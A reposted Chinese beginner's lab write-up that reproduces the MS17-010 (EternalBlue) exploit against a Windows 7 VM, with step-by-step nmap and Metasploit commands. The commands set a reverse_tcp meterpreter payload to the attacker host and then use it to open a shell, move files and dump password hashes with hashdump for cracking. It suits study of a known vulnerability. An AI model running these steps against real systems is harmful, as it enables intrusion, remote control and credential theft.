• 首页 首页 icon
  • 工具库 工具库 icon
    • IP查询 IP查询 icon
  • 内容库 内容库 icon
    • 快讯库 快讯库 icon
    • 精品库 精品库 icon
    • 问答库 问答库 icon
  • 更多 更多 icon
    • 服务条款 服务条款 icon

网络安全小白学习记录-2

武飞扬头像
看到请踹我去学习
帮助2

渗透测试-MS17-010(永恒之蓝)漏洞复现

环境介绍

攻击机:Kali-Linux IP:192.168.16.130

靶机:Windows7 IP:192.168.16.131

工具使用

Nmap扫描工具:

网络扫描工具,准确探测单台主机的详细情况,对大范围的IP地主段扫描。扫描目标网络上有哪些主机上存活的,哪些服务是开放的,甚至可能知道网络中使用何种类型的防火墙设备

Metasploit框架:

Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具。

复现过程

  • 进入kali终端,进入管理员权限,同时使用nmap工具(kali自带)扫描端口信息
sudo su
nmap -T4 -A -v -Pn 192.168.16.131/24

学新通

学新通

nmap扫描工具中 -A 选项用于使用进攻性方式扫描;
-T4 指定扫描过程使用的时序,总共有6个级别(0-5),级别越高,速度越快,但也容易被防火墙发现;
-v 表示显示冗余信息,在扫描过程中显示扫描的细节;
-Pn 在扫描之前,不发送ICMP echo请求测试目标是否存活;
nmap常用命令可参考如下:
  • 启动msf,启动Metasploit框架
msfconsole

学新通

  • 搜索ms17-010模块
search ms17-010

学新通 其中exploit为攻击模块,auxiliary为辅助模块

  • 使用3模块,检查漏洞是否存在,同时检查参数
use 3
show options

Required中显示yes为必填项

  • 设置rhosts目标IP,同时查看参数
set rhosts 192.168.16.131
show options

学新通

  • 运行扫描模块
run

学新通 存在ms17-010!后续进行攻击~

  • 使用攻击模块
use 0

学新通 查看参数show options,并设置参数;

其中payload为攻击载荷,为目标系统在被渗透攻击之后去执行的代码,这里采用默认;

lhost为攻击者,即kali攻击机;

set payload windows/x64/meterpreter/reverse_tcp
set rhosts 192.168.16.131
set lhost 192.168.16.130

学新通

  • 设置完成后进行攻击
run

学新通

  • 攻击成功后则使用meterpreter进行后渗透操作

Meterpreter可提供驻内存免杀能力高级后门工具,特权提升、跳板攻击与内网拓展等

  • 进行屏幕截图screenshot,图片名如下:
screenshot

学新通

  • Upload进行上传操作,将该照片上传到win7C盘目录下,注意使用双\
upload /home/kali/vdgNGLiI.jpeg c:\\

学新通

  • Download进行下载操作,在win7C盘新建1..txt文件,下载到kali系统文件中
download c:\\1..txt /home/kali

学新通

学新通

  • 在kali文件打开txt如下:

学新通

  • 查看权限

windows:getuid

linux:whoami

getuid

学新通 得知为管理员权限

  • 利用shell进去win7系统,对靶机win7进行控制
shell
  • Chcp 65001进行改变乱码
chcp 65001
  • 在windows系统中使用ipconfig命令查看ip地址,为192.168.16.131,与前一致
ipconfig

学新通

  • 使用dir命令查看文件目录
dir

学新通

学新通

  • 使用命令exit可以退出该系统
exit

学新通

  • 使用hashdump命令可以导出目标数据库中用户信息
hashdump

学新通 其中后续信息为账号密码,可在cmd5在线解密平台进行破译

学新通

以上内容为MS17-010(永恒之蓝)漏洞复现

声明

以上内容仅代表作者个人学习观点,供学习参考

这篇好文章是转载于:编程之路

  • 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
  • 本站站名: 编程之路
  • 本文地址: /boutique/detail/tanhgeceak
系列文章
更多 icon
同类精品
更多 icon
继续加载